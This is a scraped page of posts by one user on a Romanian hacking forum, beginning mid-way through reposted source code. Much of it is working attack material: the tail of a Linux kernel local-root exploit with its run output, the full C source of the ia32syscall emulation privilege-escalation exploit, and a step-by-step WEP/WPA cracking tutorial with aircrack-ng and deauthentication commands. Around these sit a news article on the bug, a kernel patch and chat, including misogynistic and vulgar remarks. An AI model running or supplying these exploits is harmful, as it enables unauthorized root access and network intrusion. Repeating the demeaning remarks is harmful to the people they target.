RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off; } } static void env_prepare(int argc, char* argv[]) { put_your_hands_up_hooker(argc, argv); if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) // try fops { __pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d\n"); if(!_m_fops) _m_fops = get_sym(RW_FOPS); /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO * Thanks to the guy who killed this vector... you know who you are:) * Lucky for you, there are more:) */ if(_m_fops) { usefops=1; __pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzz\n"); } } if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel) { curr_target = lsm_rhel_find_target(1); if(!curr_target) { __pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n"); } else uselsm=1; } if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) { // -i flag curr_target = lsm_rhel_find_target(0); if(!curr_target) { __pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.\n"); /* remove Selinux Flag */ flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX; } } if(!usefops && !useidt && !uselsm) __yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l\n"); } static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack) { int socklen_l = 8 + stack - addr - 16; return socklen_l; } static struct socketcallAT at; static __dgdhdytrg55 idtover[4] = {0x00100000UL, 0x0020ee00UL, 0x00000000UL, 0x00000000UL}; static void fillsocketcallAT() { at.s = s; at.level = SOL_IP; at.optname = MCAST_MSFILTER; at.optval = buffer; at.optlen = &magiclen; } static void bitch_call(struct socketcallAT *at, void *stack) { asm volatile( "push %%ebx\t\n" "push %%esi\t\n" "push %%ecx\t\n" "push %%edx\t\n" "movl $0x66, %%eax\t\n" "movl $0xf, %%ebx\t\n" "movl %%esp, %%esi\t\n" "movl %0, %%ecx\t\n" "movl %1, %%esp\t\n" "int $0x80\t\n" "movl %%esi, %%esp\t\n" "pop %%edx\t\n" "pop %%ecx\t\n" "pop %%esi\t\n" "pop %%ebx\t\n" : : "r"(at), "r"(stack) : "memory", "eax", "ecx", "ebx", "esi" ); } static void __setmcbuffer(__dgdhdytrg55 value) { int i; __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer; for(i=0; i<sizeof(buffer)/sizeof(void*); i++) *(p+i) = value; } static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase) { int i; __dgdhdytrg55 curr; for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++) { curr = idtover[i]; __setmcbuffer(curr); magiclen = get_socklen(idtbase + (i*4), Y0Y0STOP); bitch_call(&at, (void*)Y0Y0STOP); } } static void y0y0stack() { void* map = mmap((void*)Y0Y0SMAP, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1,0); if(MAP_FAILED == map) __xxxfdgftr_hshsgdt("mmap"); } static void y0y0code() { void* map = mmap((void*)Y0Y0CMAP, PAGE_SIZE, #ifdef TRY_REMAP_DEFAULT PROT_READ|PROT_WRITE, #else PROT_READ|PROT_WRITE|PROT_EXEC, #endif MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1,0); if(MAP_FAILED == map) __xxxfdgftr_hshsgdt("mmap"); } static int rey0y0code(unsigned long old) { int fd; void *map; volatile char wizard; char cwd[1024]; getcwd(cwd, sizeof(cwd)); strcat(cwd, "/__tmpfile"); unlink(cwd); fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU); if(fd < 0) return -1; write(fd, (const void*)old, PAGE_SIZE); if(munmap((void*)old, PAGE_SIZE) < 0) return -1; map = mmap((void*)old, PAGE_SIZE, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, fd,0); if(map == MAP_FAILED) return -1; /* avoid lazy page fault handler * Triple Fault when using idt vector * and no pages are already mapped:) */ wizard = *((char*)old); unlink(cwd); return wizard; } int main(int argc, char*argv[]) { int uid,fd; __yyrhdgdtfs66ytgetrfd *patch, idtb; struct pollfd pfd; printf(BANNER); uid = getuid(); env_prepare(argc, argv); y0y0stack(); y0y0code(); if(useidt) { idtb = getidt(); __gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llx\n", idtb); __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - IDT m3th34d\n"); patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT); *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T); __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n"); if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) { __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n"); p4tch_sel1nux_codztegfaddczda(curr_target); } __dhdyetgdfstreg__((void*)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345)); } else if(usefops || uselsm) { __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d\n"); patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF); *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T); __setmcbuffer(J0J0S); __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n"); if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) { __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n"); p4tch_sel1nux_codztegfaddczda(curr_target); } __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0)); } /* set shellcode level 2 */ if(flags & KERN_DGGDYDTEGGETFDRLAK) { __pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3z\n"); __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr)); } else { __pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llz\n"); __dhdyetgdfstreg__((void*)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc)); *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid; } __pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4l\n"); s = socket(AF_INET, SOCK_DGRAM, 0); if(s < 0) __xxxfdgftr_hshsgdt("socket"); fillsocketcallAT(); #ifdef TRY_REMAP_DEFAULT if(rey0y0code(Y0Y0CMAP) < 0) __yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1t\t\n"); #endif if(useidt) { __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd); __gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %d\n", 0xdd); idt_smash((idtentry)); sleep(1); asm volatile("int $0xdd\t\n"); } else if(usefops) { magiclen = get_socklen(_m_fops, Y0Y0STOP); magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd); __gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen); __pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3nt\n"); bitch_call(&at, (void*)Y0Y0STOP); sleep(1); fd = open(TMAGIC_66TDFDRTS, O_RDONLY); if(fd < 0) __xxxfdgftr_hshsgdt("!!! fuq t1m3r_l1st"); pfd.fd = fd; pfd.events = POLLIN | POLLOUT; poll(&pfd, 1, 0); } else if(uselsm) { int msqid; __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF); __yyrhdgdtfs66ytgetrfd dummy_msg_off = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF); __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF); msqid = msgget(0, IPC_PRIVATE|0600); if(msqid < 0) __xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t"); magiclen = get_socklen(selinux_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(dummy_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(dummy_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(capability_msg_off, Y0Y0STOP); __setmcbuffer(J0J0S); bitch_call(&at, (void*)Y0Y0STOP); magiclen = get_socklen(capability_msg_off+4, Y0Y0STOP); __setmcbuffer(0); bitch_call(&at, (void*)Y0Y0STOP); msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it } munmap((void*)Y0Y0CMAP, PAGE_SIZE); /* exec */ if(getuid() == 0) { pid_t pid; __pppp_tegddewyfg("$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n"); pid = fork(); if(pid == 0) { char *args[] = {"/bin/sh", "-i", NULL}; char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0", "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL }; execve("/bin/sh", args, envp); } else { int status; waitpid(pid, &status, 0); } } else __pppp_tegddewyfg("!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!\n"); close(s); return 0; } #endif // -m32 Rezultat pe 2.6.34.4-0.1-default (lipsa de ocupatie): nytro@rst[/home/nytro/Documents]: ./test Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y $$$ Kallsyms +r $$$ K3rn3l r3l3as3: 2.6.34.4-0.1-default $$$ prepare_creds->c02647b0 $$$ override_creds->c02645b0 $$$ revert_creds->c0264750 $$$ Kernel Credentials detected [COLOR="Red"]!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z[/COLOR] nytro@rst[/home/nytro/Documents]:
  11. Nytro
    x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation Cate ceva despre el: http://rstcenter.com/forum/25902-die-hard-bug-bytes-linux-kernel-second-time.rst /* * exploit for x86_64 linux kernel ia32syscall emulation (again) * rediscovered by ben hawkes * with help from robert swiecki and tavis ormandy * * original vulnerability discovered by Wojciech Purczynski * * original exploit by * Robert Swiecki <robert_at_swiecki.net> * Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl> * Pawel Pisarczyk <pawel_at_immos.com.pl> * * kernel priv escalation code borrowed from spender * */ #include <sys/types.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <inttypes.h> #include <sys/reg.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <string.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int kernelmodecode(void *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret = 0, oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while (ret != EOF) { if (!oldstyle) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); } else { ret = fscanf(f, "%p %s\n", (void **) &addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) { continue; } p = strrchr(sname, '_'); if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') { p--; } *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { printf("resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } static void docall(uint64_t *ptr, uint64_t size) { commit_creds = (_commit_creds) get_symbol("commit_creds"); if (!commit_creds) { printf("symbol table not available, aborting!\n"); exit(1); } prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("symbol table not available, aborting!\n"); exit(1); } uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); printf("mapping at %lx\n", tmp); if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } for (; (uint64_t) ptr < (tmp + size); ptr++) *ptr = (uint64_t)kernelmodecode; __asm__("\n" "\tmovq $0x101, %rax\n" "\tint $0x80\n"); printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); execl("/bin/sh", "bin/sh", NULL); printf("no /bin/sh ??\n"); exit(0); } int main(int argc, char **argv) { int pid, status, set = 0; uint64_t rax; uint64_t kern_s = 0xffffffff80000000; uint64_t kern_e = 0xffffffff84000000; uint64_t off = 0x0000000800000101 * 8; if (argc == 4) { docall((uint64_t*)(kern_s + off), kern_e - kern_s); exit(0); } if ((pid = fork()) == 0) { ptrace(PTRACE_TRACEME, 0, 0, 0); execl(argv[0], argv[0], "2", "3", "4", NULL); perror("exec fault"); exit(1); } if (pid == -1) { printf("fork fault\n"); exit(1); } for ( { if (wait(&status) != pid) continue; if (WIFEXITED(status)) { printf("Process finished\n"); break; } if (!WIFSTOPPED(status)) continue; if (WSTOPSIG(status) != SIGTRAP) { printf("Process received signal: %d\n", WSTOPSIG(status)); break; } rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); if (rax == 0x000000000101) { if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { printf("PTRACE_POKEUSER fault\n"); exit(1); } set = 1; //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); } if ((rax == 11) && set) { ptrace(PTRACE_DETACH, pid, 0, 0); for( sleep(10000); } if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { printf("PTRACE_SYSCALL fault\n"); exit(1); } } return 0; }
  12. Nytro
    Daca poti ajuta, de ce nu postezi aici sa ajuti mai multa lume?
  13. Nytro
    Da, probabil cei de la Ubuntu repara astfel de probleme (banale) si le pastreaza decat pentru ei. Ceea ce inseamna ca sunt nesimtiti. Nu contribuie mai deloc la kernel, sunt un fel de leecheri. Oricum, inainte de compilare, am selectat mai toate optiunile, sa verific unde apar erori sau avertismente. Si la ultima versiune am primit o eroare fatala, dar nu am avut timp sa ma uit sa vad despre ce e vorba, a inceput scoala . O sa mai vin cu catea astfel de bugfix-uri, apoi cine stie, poate o sa mai invat cate ceva si trec mai departe. Edit: Pentru avertismentele acelea (xfs_alloc.c) a aparut patch-ul: http://www.kernel.org/diff/diffview.cgi?file=%2Fpub%2Flinux%2Fkernel%2Fv2.6%2Fnext%2Fpatch-v2.6.36-rc4-next-20100917.bz2;z=3819
  14. Nytro
    Get your root access here By Dan Goodin in San Francisco 15th September 2010 18:21 GMT The Linux kernel has been purged of a bug that gave root access to untrusted users – again. The vulnerability in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa) was fixed once before – in 2007 with the release of version 2.6.22.7. But several months later, developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access. The bug was originally discovered by the late hacker Wojciech "cliph" Purczynski. But Ben Hawkes, the researcher who discovered the kernel regression bug, said here that he grew suspicious when he recently began tinkering under the hood of the open-source OS and saw signs the flaw was still active. “I showed this to my friend Robert Swiecki who had written an exploit for the original bug in 2007, and he immediately said something along the lines of 'well this is interesting,'” Hawkes wrote. “We pulled up his old exploit from 2007, and with a few minor modifications to the privilege escalation code, we had a root shell.” No doubt, Linux fans will be quick to point out that the bug can be exploited only by those with a valid account on a targeted machine in the first place. This is true, but the existence of vulnerabilities like these are a big deal in corporate, government and educational environments, where Linux is a mainstay has a large following. Add privilege escalation to the mix and things like protected mode, integrity levels, and chroot – often the very reason the OS was chosen in the first place – are largely wiped out. The oversight means that untrusted users with, say, limited SSH access have a trivial means to gain unfettered access to pretty much any 64-bit installation. Consider, too, that the bug has been allowed to fester in the kernel for years and was already fixed once before and we think a measured WTF is in order. It was one of two privilege-elevation vulnerabilities Hawkes disclosed on Wednesday in the Linux 32-bit compatibility mode. The official updates are here, here and here. ®
  15. Nytro
    Probabil o sa apara si acest patch in cine stie ce versiune urmatoare de kernel: --- a/fs/xfs/xfs_dir2_data.h 2010-09-02 11:13:11.632007536 +0300 +++ b/fs/xfs/xfs_dir2_data.h 2010-09-02 11:13:28.080006488 +0300 @@ -87,7 +87,7 @@ typedef struct xfs_dir2_data_entry { __be64 inumber; /* inode number */ __u8 namelen; /* name length */ - __u8 name[1]; /* name bytes, no null */ + __u8 name[2]; /* name bytes, no null */ /* variable offset */ __be16 tag; /* starting offset of us */ } xfs_dir2_data_entry_t; E vorba de un vector cu un singur element, dar se folosesc doua elemente, si apare o eroare urata. Se foloseste name[1] cand nu exista decat name[0]. Si acum discut cu cu Alex Elder, maintainer-ul, despre un alt patch dar pe acela nu l-am trimis cum trebuia. Edit: Va fi reparat si celalalt bug, e cam prostie avertismentul generat: fs/xfs/xfs_alloc.c: In function ‘xfs_alloc_ag_vextent_near’: fs/xfs/xfs_alloc.c:694:15: warning: ‘ltlena’ may be used uninitialized in this function fs/xfs/xfs_alloc.c:683:15: warning: ‘gtlena’ may be used uninitialized in this function Acele variabile sunt initializate in niste expresii conditionate, de aceea apare acel avertisment, insa in practica nu e nici o problema. Dar e urat sa apara astfel de erori la compilarea kernelului. Rezolvarea e banala, initializarea acelor variabile cu 0.
  16. Nytro
    Daca stiti C++ cea mai buna solutie e sa aruncati o privire peste libpurple.
  17. Nytro
    Uite ca exista si oameni care nu cer bani pentru orice. Mutat la Stuff tools, aici o sa "dispara" repede.
  18. Nytro
    De vreo 5 luni folosesc si eu aproape numai Linux (am folosit Windows cat am scris articolul despre Winsock API). Si imi place libertatea oferita. Bine, mai opresc eu servicii fara sa ma interesez ce rost au si mai stric cate ceva, dar am invatat cum sta treaba. Oricum, nu place Gnome deloc la mine, KDE rullz.
  19. Nytro
    How To Crack WEP and WPA Wireless Networks Autor: Habar n-am With the popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home/SOHO users and IT professionals alike. This article is aimed at illustrating current security flaws in WEP/WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology, as well as working with command-line tools. A basic familiarity with Linux can be helpful as well. Disclaimer: Attempting to access a network other than your own, or one you have permission to use is illegal insome U.S. jurisdictions. Speed Guide, Inc. are not to be held liable for any damages resulting from the use or misuse of the information in this article. To successfully crack WEP/WPA, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. This NIC mode is driver-dependent, and only a relatively small number of network cards support this mode under Windows. One of the best free utilities for monitoring wireless traffic and cracking WEP/WPA-PSK keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows). The aircrack-ng site has a comprehensive list of supported network cards available here: NIC chipset compatability list. If your network card is not supported under Windows, one can use a free Linux Live CD to boot the system. BackTrack 3 is probably the most commonly used distribution, since it runs from a Live CD, and has aircrack-ng and a number of related tools already installed. For this article, I am using aircrack-ng version 1.0 on a Linux partition (Fedora Core 10, 2.6 32-bit kernel) on my Sony Vaio SZ-680 laptop, using the built-in Intel 4965agn network card. If you're using the BackTrack 3 CD aircrack-ng is already installed, with my version of linux it was as simple as finding it with: yum search aircrack-ng yum install aircrack-ng The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key cracking. The ones we will be using are: airmon-ng - script used for switching the wireless network card to monitor mode airodump-ng - for WLAN monitoring and capturing network packets aireplay-ng - used to generate additional traffic on the wireless network aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data. 1. Setup (airmon-ng) As mentioned above, to capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that under linux, in a terminal window (logged in as root), type: iwconfig (to find all wireless network interfaces and their status) airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name) Note: You can use the su command to switch to a root account. Other related Linux commands: ifconfig (to list available network interfaces, my network card is listed as wlan0) ifconfig wlan0 down (to stop the specified network card) ifconfig wlan0 hw ether 00:11:22:33:44:55 (change the MAC address of a NIC - can even simulate the MAC of an associated client. NIC should be stopped before chaning MAC address) iwconfig wlan0 mode monitor (to set the network card in monitor mode) ifconfig wlan0 up (to start the network card) iwconfig - similar to ifconfig, but dedicated to the wireless interfaces. 2. Recon Stage (airodump-ng) This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target: airodump-ng mon0 - monitors all channels, listing available access points and associated clients within range. It is best to select a target network with strong signal (PWR column), more traffic (Beacons/Data columns) and associated clients (listed below all access points). Once you've selected a target, note its Channel and BSSID (MAC address). Also note any STATION associated with the same BSSID (client MAC addresses). running airodump-ng displays all wireless access points and associated clients in range, as well as MAC addresses, SSIDs, signal levels and other information about them. WEP is much easier to crack than WPA-PSK, as it only requires data capturing (between 20k and 40k packets), while WPA-PSK needs a dictionary attack on a captured handshake between the access point and an associated client which may or may not work. 3. Capture Data (airodump-ng) To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels. Assuming our wireless card is mon0, and we want to capture packets on channel 6 into a text file called data: airodump-ng -c 6 bssid 00:0F:CC:7D:5A:74 -w data mon0 (-c6 switch would capture data on channel 6, bssid 00:0F:CC:7D:5A:74 is the MAC address of our target access point, -w data specifies that we want to save captured packets into a file called "data" in the current directory, mon0 is our wireless network adapter) Running airodump-ng on a single channel targeting a specific access point Notes: You typically need between 20,000 and 40,000 data packets to successfully recover a WEP key. One can also use the "--ivs" switch with the airodump-ng command to capture only IVs, instead of whole packets, reducing the required disk space. However, this switch can only be used if targeting a WEP network, and renders some types of attacks useless. 4. Increase Traffic (aireplay-ng) - optional step for WEP cracking An active network can usually be penetrated within a few minutes. However, slow networks can take hours, even days to collect enough data for recovering the WEP key. This optional step allows a compatible network interface to inject/generate packets to increase traffic on the wireless network, therefore greatly reducing the time required for capturing data. The aireplay-ng command should be executed in a separate terminal window, concurrent to airodump-ng. It requires a compatible network card and driver that allows for injection mode. Assuming your network card is capable of injecting packets, in a separate terminal window try: aireplay-ng -3 -b 00:0F:CC:7D:5A:74 -h 00:14:A5:2F:A7:DE -x 50 wlan0 -3 --> this specifies the type of attack, in our case ARP-request replay -b ..... --> MAC address of access point -h ..... --> MAC address of associated client from airodump -x 50 --> limit to sending 50 packets per second wlan0 --> our wireless network interface aireplay-ng allows for injecting packets to greatly reduce the time required to recover a WEP key Notes: To test whether your nic is able to inject packets, you may want to try: aireplay-ng -9 wlan0. You may also want to read the information available -here-. To see all available replay attacks, type just: aireplay-ng 5. Crack WEP (aircrack-ng) WEP cracking is a simple process, only requiring collection of enough data to then extract the key and connect to the network. You can crack the WEP key while capturing data. In fact, aircrack-ng will re-attempt cracking the key after every 5000 packets. To attempt recovering the WEP key, in a new terminal window, type: aircrack-ng data*.cap (assuming your capture file is called data...cap, and is located in the same directory) aircrack-ng can successfully recover a WEP key with 10-40k captured packets. The retreived key is in hexadecimal, and can be entered directly into a wireless client omitting the ":" separators Notes: If your data file contains ivs/packets from different access points, you may be presented with a list to choose which one to recover. Usually, between 20k and 40k packets are needed to successfully crack a WEP key. It may sometimes work with as few as 10,000 packets with short keys. 6. Crack WPA or WPA2 PSK (aircrack-ng) WPA, unlike WEP rotates the network key on a per-packet basis, rendering the WEP method of penetration useless. Cracking a WPA-PSK/WPA2-PSK key requires a dictionary attack on a handshake between an access point and a client. What this means is, you need to wait until a wireless client associates with the network (or deassociate an already connected client so they automatically reconnect). All that needs to be captured is the initial "four-way-handshake" association between the access point and a client. Essentially, the weakness of WPA-PSK comes down to the passphrase. A short/weak passphrase makes it vulnerable to dictionary attacks. To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. This can be obtained using the same technique as with WEP in step 3 above, using airodump-ng. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using: aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_IP is the MAC address of the access point, MAC_Client is the MAC address of an associated client, mon0 is your wireless NIC). Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases. See related links below for some wordlist links. You can, then execute the following command in a linux terminal window (assuming both the dictionary file and captured data file are in the same directory): aircrack-ng -w wordlist capture_file (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake) Additional Notes: Cracking WPA-PSK and WPA2-PSK only needs 4 packets of data from the network (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files. A good size wordlist should be 20+ Megabytes in size, cracking a strong passphrase will take hours and is CPU intensive. Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack. My record time was less than a minute on an all-caps 10-character passphrase using common words with less than 11,000 tested keys! A modern laptop can process over 10 Million possible keys in less than 3 hours. WPA hashes the network key using the wireless access point's SSID as salt. This prevents the statistical key-grabbing techniques that broke WEP, and makes hash precomputation more dificult because the specific SSID needs to be added as salt for the hash. There are some tools like coWPAtty that can use precomputed hash files to speed up dictionary attacks. Those hash files can be very effective (sicne they're much less CPU intensive and therefore faster), but quite big in size. The Church of WiFi has computed hash tables for the 1000 most common SSIDs against a million common passphrases that are 7Gb and 33Gb in size...
  20. Nytro
    Eu aveam ceva incredere in femei, dar de ceva (mai mult) timp nu mai am. Nu merita decat muie majoritatea. De fapt, nu pentru asta sunt ele facute?
  21. Nytro
    Trebuie sa implementezi protocolul YMSG. Si faci asta pe un server care ruleaza non-stop. Creezi un ID, il loghezi, si in functie de mesajele primite, faci anumite lucruri. De exemplu, daca zice cineva botului tau "vreme Cluj", cauti vremea in Cluj pe un site (CURL daca faci botul in PHP de exemplu) si trimiti vremea. Asta e ideea de baza.
  22. Nytro
    Romania are si parti bune si parti rele. Sa prezinte si partile bune. Intre timp sa le dam la muie. Ce domenii (top level) au elvetienii astia? Edit: .ch
  23. Nytro

    Ras pe picioare

    Nytro replied to Nytro's topic in Off-topic

    Eu fac sala, si muschii de la picioare se vad binisor, se vede destul de bine forma lor, si nu cred ca e necesar sa ma rad pentru a se vedea asta. Nu neaparat ca e "gay", dar parul e ceva barbatesc, la multi e singurul element care inseamna masculinitate, ca muschi nema, par nema, isi mai lasa si parul lung, si mai sunt si care se dau cu lac pe unchii sau alte rahaturi. Legat de ce spun fetele, 90% din cele pe care le cunosc, nu numai ca nu plac, dar nu suporta baietii care se rad pe picioare sau fac alte lucruri pe care le fac fetele. Cu alte cuvinte, astia care se rad pe picioare sau altceva, incet, incet o sa faca din ce in ce mai multe lucruri pe care le fac decat fetele, ajung sa se fardeze, si da, aveti dreptate, nu o sa fie gay ci travestiti. Unor fete le place, dar le place acelor fete carora le plac persoanele mai feminine, care le plac fetele mai mult decat normal ca sa spun asa. Am vazut multi care s-au ras, si sa fim seriosi, arata ca pula. Si asta nu ar fi singura problema. Baietii din ziua de azi se penseaza ca fetele, sprancene subtiri si nu numai. Unde o sa ajunga lumea asta? Daca vad picioarele cuiva si nu vad par pe ele cum imi dau seama daca e fata sau baiat? O sa inceapa sa se rada si pe maini si o sa ajungem o natie numai de "femei". Na, fiecare cu opinia lui, e o tara libera.
  24. Nytro
    Florin Salam - V-am facut-o
  25. Nytro
    Nu e Windows, e un alt sistem de operare. Si nu, in nici un caz nu e prentru jocuri. Nici pentru multimedia nu prea e.
×
×
  • Create New...